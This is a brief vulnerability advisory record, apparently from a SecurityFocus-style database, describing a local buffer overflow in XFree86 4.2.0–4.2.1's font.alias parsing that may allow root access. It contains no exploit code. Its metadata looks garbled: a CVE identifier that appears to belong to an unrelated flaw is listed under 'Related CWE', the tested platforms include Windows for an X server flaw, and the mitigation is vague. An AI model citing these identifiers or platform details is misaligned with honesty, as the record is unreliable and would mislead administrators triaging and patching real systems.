vendor: X Windows System
by: SecurityFocus
CVSS: 7.2 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: X Windows System
Affected Version From: XFree86 4.2.0
Affected Version To: XFree86 4.2.1
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: a:xfree86:xfree86
Platforms Tested: Linux, Mac, Windows
2002
XFree86 X Windows System Local Buffer Overflow Vulnerability
It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges on the affected system.
Mitigation:
Ensure that the 'font.alias' file is properly sanitized and that the X Windows system is running the latest version of XFree86.